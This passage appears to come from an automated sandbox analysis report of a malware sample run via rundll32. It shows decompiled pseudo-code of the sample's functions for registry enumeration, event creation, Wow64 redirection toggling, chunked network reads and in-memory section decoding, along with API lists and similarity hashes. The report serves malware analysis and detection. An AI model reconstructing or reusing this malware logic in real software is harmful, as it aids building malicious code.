										E04443389( *_t47, _t91, _a8,  *0x444a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d044490
										E04443389( *_t49, _t91, _t99,  *0x444a380, _a16);
										E044430D1(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d044490, executed
									E04443389( *_t40, _t91, _a8,  *0x444a388, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d044490
									E04443389( *_t43, _t91, _a8,  *0x444a380, _a16);
								}
								if( *_t101 != 0) {
									E044430D1(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d044490, executed
					_t81 = E04446184( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d044490
							E0444543F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E044430D1(_t100);
						_t98 = _a16;
					}
					E044430D1(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04447801(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x444a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x04445b1e
0x04445b27
0x04445b2e
0x04445b33
0x04445ba0
0x04445ba6
0x04445bab
0x04445bb2
0x04445bb9
0x04445bbc
0x04445d27
0x04445d2e
0x04445d2e
0x04445d33
0x04445d35
0x04445d35
0x04445d3e
0x04445d3e
0x04445bc2
0x04445bc7
0x04445bce
0x04445d1d
0x04445d20
0x00000000
0x04445d20
0x04445bd4
0x04445bd9
0x04445bdc
0x04445be3
0x04445be6
0x04445c2f
0x04445c2f
0x04445c42
0x04445c45
0x04445c4c
0x04445c54
0x04445c59
0x04445c63
0x04445c63
0x04445c5b
0x04445c5b
0x04445c5b
0x04445c5b
0x04445c85
0x04445c8d
0x04445cbb
0x04445cc0
0x04445cc7
0x04445ccc
0x04445cd0
0x04445d02
0x04445cd2
0x04445cdf
0x04445ce2
0x04445cf2
0x04445cf5
0x04445cfb
0x04445cfb
0x04445c8f
0x04445c9c
0x04445c9f
0x04445cb1
0x04445cb4
0x04445cb4
0x04445d0c
0x04445d18
0x04445d0e
0x04445d11
0x04445d11
0x04445d0c
0x04445c85
0x00000000
0x04445c4c
0x04445bf5
0x04445bf8
0x04445bff
0x04445c05
0x04445c08
0x04445c0a
0x04445c16
0x04445c19
0x04445c19
0x04445c1f
0x04445c24
0x04445c24
0x04445c2a
0x00000000
0x04445c2a
0x04445b38
0x00000000
0x04445b5f
0x04445b5f
0x04445b6b
0x04445b7e
0x04445b84
0x04445b8c
0x00000000
0x04445b8c

APIs

StrChrA.SHLWAPI(04441EAE,0000005F,00000000,00000000,00000104), ref: 04445B51
lstrcpy.KERNEL32(?,?), ref: 04445B7E

Part of subcall function 04442DDF: lstrlen.KERNEL32(?,00000000,05349CC0,7742C740,04442908,05349EC5,044464C9,044464C9,?,044464C9,?,69B25F44,E8FA7DD7,00000000), ref: 04442DE6
Part of subcall function 04442DDF: mbstowcs.NTDLL ref: 04442E0F
Part of subcall function 04442DDF: memset.NTDLL ref: 04442E21

Part of subcall function 04443389: lstrlenW.KERNEL32(?,?,?,04445CE7,3D044490,80000002,04441EAE,04441A9B,74666F53,4D4C4B48,04441A9B,?,3D044490,80000002,04441EAE,?), ref: 044433AE

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

lstrcpy.KERNEL32(?,00000000), ref: 04445BA0

Strings

\, xrefs: 04445B84
(, xrefs: 04445C01

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: dd86023dd338b7b5428122c3ec9856ddfb0e048f98ef489be03bf8c4f3731396
Instruction ID: 8733c6d9c2e206801b4f7c93fb35cfa6bdfd32ef449a146997cc3e2df28a08b2
Opcode Fuzzy Hash: dd86023dd338b7b5428122c3ec9856ddfb0e048f98ef489be03bf8c4f3731396
Instruction Fuzzy Hash: B4515C75200609FFFF219F61DC44EAA7BB9FF84304F10851AFA1592161EB39F925AB10

Uniqueness

Uniqueness Score: -1.00%

Function 70321BA0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(0000062B,7037E670,00000000), ref: 70321C15
VirtualProtectEx.KERNELBASE(000000FF,7038AF14,000031B7,00000040,70389688), ref: 70321C57
GetEnvironmentVariableW.KERNEL32(70333580,7037E670,0000062B), ref: 70321CB4

Strings

X, xrefs: 70321BA7
@, xrefs: 70321BB5

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: CurrentDirectoryEnvironmentProtectVariableVirtual
String ID: @$X
API String ID: 2483294617-461597874
Opcode ID: b566add2f59263674aa5d97723199209f4c78fa6bd9e079369372fbc581ed045
Instruction ID: cce71619dff30a101460d0007829dcc9d91f48c384b33424ae05f513161e7330
Opcode Fuzzy Hash: b566add2f59263674aa5d97723199209f4c78fa6bd9e079369372fbc581ed045
Instruction Fuzzy Hash: F8515AB290415A9FCB08DFAECDD4ABEBBB4FB88304B24825DD455B7355D7306640CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 044438B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E044438B3(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E04445856(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x444a2d4; // 0xefd5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x444b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x444b90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x444a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x044438b3
0x044438ba
0x044438be
0x044438c3
0x044438ca
0x044438cd
0x044438d7
0x044438dc
0x044438e8
0x044438ef
0x044438f9
0x044438f9
0x044438f1
0x044438f1
0x044438f1
0x044438f1
0x044438ff
0x04443902
0x0444390a
0x0444390d
0x04443910
0x04443913
0x04443918
0x04443921
0x0444392e
0x04443923
0x04443929
0x04443929
0x04443934
0x04443934
0x0444393c

APIs

Part of subcall function 04445856: SysAllocString.OLEAUT32(?), ref: 044458B2
Part of subcall function 04445856: SysAllocString.OLEAUT32(0070006F), ref: 044458C6
Part of subcall function 04445856: SysAllocString.OLEAUT32(00000000), ref: 044458D8
Part of subcall function 04445856: SysFreeString.OLEAUT32(00000000), ref: 0444593C

memset.NTDLL ref: 044438D7
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04443913
GetLastError.KERNEL32 ref: 04443923
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04443934

Strings

<, xrefs: 044438E8

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: d9d7c91a7c83723a04ffcd34fb38cb35f34c9985a136467453879ffcd8179a20
Instruction ID: 163310ad752100643677e3a1aa96b43a1c32297285655e2e2b7f35f753d73ead
Opcode Fuzzy Hash: d9d7c91a7c83723a04ffcd34fb38cb35f34c9985a136467453879ffcd8179a20
Instruction Fuzzy Hash: 93110CB5A00218ABFF10DFA5D885BDA7BF8FB88794F008016F905E7241E774E944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04445094, Relevance: 7.6, APIs: 5, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04445094(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x444a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x444a2d4; // 0xefd5a8
				_t3 = _t8 + 0x444b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E044465BD(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x444a2f8, 1, 0, _t30);
					E044430D1(_t30);
				}
				_t12 =  *0x444a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E04446244(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E044438B3(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E04445DD0(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x04445095
0x0444509c
0x044450a6
0x044450aa
0x044450b0
0x044450bd
0x044450c4
0x044450c8
0x044450da
0x044450dc
0x044450dc
0x044450e1
0x044450e8
0x044450f3
0x00000000
0x00000000
0x044450f5
0x044450fc
0x00000000
0x00000000
0x04445109
0x0444510d
0x0444510f
0x04445114
0x04445114
0x0444511c
0x04445121
0x04445125
0x04445129
0x00000000
0x00000000
0x04445137
0x0444513b
0x00000000
0x00000000
0x0444513b
0x00000000
0x0444513d
0x0444513d
0x0444513d
0x04445143
0x04445145
0x04445145
0x0444514f
0x04445153
0x04445165
0x04445165
0x04445169
0x0444516f
0x0444516f
0x04445172
0x04445174
0x04445177
0x04445177
0x0444517e
0x04445184
0x04445184

APIs

Part of subcall function 044465BD: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,05349CC0,7742C740,044464C9,?,69B25F44,E8FA7DD7,00000000,?,?,?,044464C9), ref: 044465F3
Part of subcall function 044465BD: lstrcpy.KERNEL32(00000000,00000000), ref: 04446617
Part of subcall function 044465BD: lstrcat.KERNEL32(00000000,00000000), ref: 0444661F

CreateEventA.KERNEL32(0444A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04441ECD,?,?,?), ref: 044450D3

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

StrChrW.SHLWAPI(04441ECD,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04441ECD,?,?,?), ref: 04445103
WaitForSingleObject.KERNEL32(00000000,00004E20,04441ECD,00000000,?,00000000,?,04441ECD,?,?,?,?,?,?,?,0444775B), ref: 04445131
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04441ECD,?,?,?), ref: 0444515F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04441ECD,?,?,?), ref: 04445177

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: f1e941ac31467149fd5a7b14fe00c8a668390f7f642e38af7ed38d850e041e3c
Instruction ID: e40f7b98e203c0417a5cd574fd561706017a2b2adc2e5d34a2d0dc94d77dc062
Opcode Fuzzy Hash: f1e941ac31467149fd5a7b14fe00c8a668390f7f642e38af7ed38d850e041e3c
Instruction Fuzzy Hash: 04219176A017127BFF215F689844B5BB3D9EBC4B9AF150226FF41AA341EB74EC008680

Uniqueness

Uniqueness Score: -1.00%

Function 04442A0B, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E04442A0B(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				char* _t43;
				intOrPtr _t44;
				intOrPtr* _t45;
				char _t47;
				long _t51;
				char* _t52;
				long _t53;
				intOrPtr* _t54;
				void* _t63;

				_t63 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t63 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t43 =  &_v24;
				_push(_t43);
				_push(1);
				_push(0); // executed
				E0444A144(); // executed
				if(_t43 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t44 = E04441EF5(0x1000);
				_v20 = _t44;
				if(_t44 == 0) {
					_v8 = 8;
					L21:
					_t45 = _v24;
					 *((intOrPtr*)( *_t45 + 8))(_t45);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t47 = _v12;
						if(_t47 >= 0x1000) {
							_t47 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t63 + 0x18)), _v20, _t47,  &_v16);
						if(_t47 == 0) {
							break;
						}
						_t54 = _v24;
						 *((intOrPtr*)( *_t54 + 0x10))(_t54, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x444a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E044430D1(_v20);
							if(_v8 == 0) {
								_t51 = E04441CE3(_v24, _t63); // executed
								_v8 = _t51;
							}
							goto L21;
						}
						_t52 =  &_v12;
						__imp__( *((intOrPtr*)(_t63 + 0x18)), _t52); // executed
						if(_t52 != 0) {
							goto L15;
						}
						_t53 = GetLastError();
						_v8 = _t53;
						if(_t53 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x04442a13
0x04442a16
0x04442a1f
0x04442a22
0x04442a25
0x04442a2d
0x04442b2b
0x04442b36
0x04442b39
0x04442b41
0x04442b48
0x04442b48
0x04442b3b
0x04442b3e
0x04442b3e
0x00000000
0x04442b3e
0x04442a36
0x00000000
0x00000000
0x04442a3c
0x04442a3f
0x04442a40
0x04442a42
0x04442a43
0x04442a4b
0x04442b22
0x00000000
0x04442b22
0x04442a57
0x04442a5e
0x04442a61
0x04442b10
0x04442b17
0x04442b17
0x04442b1d
0x00000000
0x00000000
0x00000000
0x00000000
0x04442a67
0x04442a67
0x04442a67
0x04442a67
0x04442a6c
0x04442a6e
0x04442a6e
0x04442a7b
0x04442a83
0x00000000
0x00000000
0x04442a85
0x04442a92
0x04442a98
0x04442a98
0x04442a9b
0x00000000
0x00000000
0x04442aa8
0x04442abc
0x04442af2
0x04442af5
0x04442af8
0x04442b00
0x04442b06
0x04442b0b
0x04442b0b
0x00000000
0x04442b00
0x04442abe
0x04442ac5
0x04442acd
0x00000000
0x00000000
0x04442acf
0x04442ada
0x04442add
0x00000000
0x04442ae4
0x04442ae4
0x00000000
0x04442ae4
0x04442add
0x04442aa5
0x00000000
0x04442ae7
0x04442ae7
0x00000000

APIs

GetLastError.KERNEL32 ref: 04442B2B

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

GetLastError.KERNEL32 ref: 04442A9F
WaitForSingleObject.KERNEL32(00000000), ref: 04442AAF
GetLastError.KERNEL32 ref: 04442ACF

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 958d8d3a6c7e07e54541649f035b050f1ef979fd3ec8e8eb90436098fc276ddf
Instruction ID: 74212aa860f8023a03b608eeb8a531fa29380205c434862093d4ee98a0e73e40
Opcode Fuzzy Hash: 958d8d3a6c7e07e54541649f035b050f1ef979fd3ec8e8eb90436098fc276ddf
Instruction Fuzzy Hash: D341D274A00215EFEF209FA5C9845AEB7B9FF84385F1044AAF901E7250D7B4AE40EB51

Uniqueness

Uniqueness Score: -1.00%

Function 044419CE, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044419CE(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E04441EF5(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E044430D1(_v28);
							goto L17;
						}
						_t42 = E04445B1E(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E044430D1(_v24);
						_v20 = _v16;
						_t47 = E04441EF5(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x444a2c4, 0) == 0x102);
				goto L16;
			}

0x044419ce
0x044419e8
0x044419eb
0x044419ee
0x044419f1
0x044419f4
0x044419fa
0x044419fe
0x04441ad8
0x04441adc
0x04441adc
0x04441a07
0x04441a0e
0x04441a15
0x04441a18
0x04441acd
0x04441ad0
0x00000000
0x04441ad6
0x04441a1e
0x04441a21
0x04441a28
0x04441a32
0x04441a3b
0x04441a41
0x04441a49
0x04441a81
0x04441abb
0x04441ac1
0x04441ac3
0x04441ac3
0x04441ac5
0x04441ac8
0x00000000
0x04441ac8
0x04441a96
0x04441a9b
0x04441a9f
0x00000000
0x00000000
0x00000000
0x04441a9f
0x04441a4e
0x04441a5d
0x00000000
0x00000000
0x04441a62
0x04441a6b
0x04441a6e
0x04441a75
0x04441a78
0x04441a53
0x04441a53
0x00000000
0x04441a53
0x04441a7c
0x00000000
0x04441a7c
0x04441a50
0x00000000
0x04441aa1
0x04441aae
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04441EAE,?), ref: 044419F4

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

RegEnumKeyExA.KERNELBASE(?,?,?,04441EAE,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04441EAE), ref: 04441A3B
WaitForSingleObject.KERNEL32(00000000,?,?,?,04441EAE,?,04441EAE,?,?,?,?,?,04441EAE,?), ref: 04441AA8
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04441EAE,?,?,?,?,?,0444775B,?), ref: 04441AD0

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: bda28d2f51a64f95a174732906044aab8dee8a0c57c5d48df80527f9e64c5e15
Instruction ID: 8b29e52ddad68dde812faef2963993f1e028a563e8a8ef3f5f3f0a4d51779669
Opcode Fuzzy Hash: bda28d2f51a64f95a174732906044aab8dee8a0c57c5d48df80527f9e64c5e15
Instruction Fuzzy Hash: 3B311C75E00119BBEF219F95DC489EFFBB9EFC4350F104267E921B2290D6745A80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 044415B4, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 0444160B
SysAllocString.OLEAUT32(04445BCC), ref: 0444164E
SysFreeString.OLEAUT32(00000000), ref: 04441662
SysFreeString.OLEAUT32(00000000), ref: 04441670

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: eb7bebbe60af7b01f5f46a861029664a3403a8c1fcbea859be80c8916dbd86ab
Instruction ID: 32fe454bdbd043f05d604467a4b99f23934c88c3cb6df32c747e01e5259a7f5b
Opcode Fuzzy Hash: eb7bebbe60af7b01f5f46a861029664a3403a8c1fcbea859be80c8916dbd86ab
Instruction Fuzzy Hash: 56315D75900209EFDF01DF98D4848AEBBB9FF88340B14802EE50AA7210D735E981CF65

Uniqueness

Uniqueness Score: -1.00%

Function 702E1C3E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E702E1C3E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x702e41b0;
				_t46 = E702E1AD2(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x702e41cc;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x702e5137; // 0x702e5137
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E702E1FB4(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x702e41cc = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x702e1c45
0x702e1c55
0x702e1c5c
0x702e1c5f
0x702e1c74
0x702e1c7b
0x702e1c80
0x702e1c91
0x702e1c94
0x702e1c9c
0x702e1c9f
0x702e1d52
0x702e1ca5
0x702e1ca5
0x702e1cab
0x702e1d1a
0x702e1cad
0x702e1cad
0x702e1cb0
0x702e1cb2
0x702e1cba
0x702e1cbd
0x702e1cc0
0x702e1cc8
0x702e1cd3
0x702e1cd4
0x702e1cd5
0x702e1cf2
0x702e1d00
0x702e1d07
0x702e1d0a
0x702e1d10
0x702e1d15
0x00000000
0x00000000
0x702e1cc5
0x702e1cc5
0x702e1d17
0x702e1d24
0x702e1d39
0x702e1d26
0x702e1d2f
0x702e1d34
0x702e1d4a
0x702e1d4a
0x702e1d59
0x702e1d5f

APIs

VirtualAlloc.KERNELBASE(00000000,702E1EC8,00003000,00000004,?,?,702E1EC8,00000001), ref: 702E1C94
memcpy.NTDLL(?,?,702E1EC8,?,?,702E1EC8,00000001), ref: 702E1D2F
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,702E1EC8,00000001), ref: 702E1D4A

Strings

Jul 29 2021, xrefs: 702E1CCB

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jul 29 2021
API String ID: 4010158826-328131158
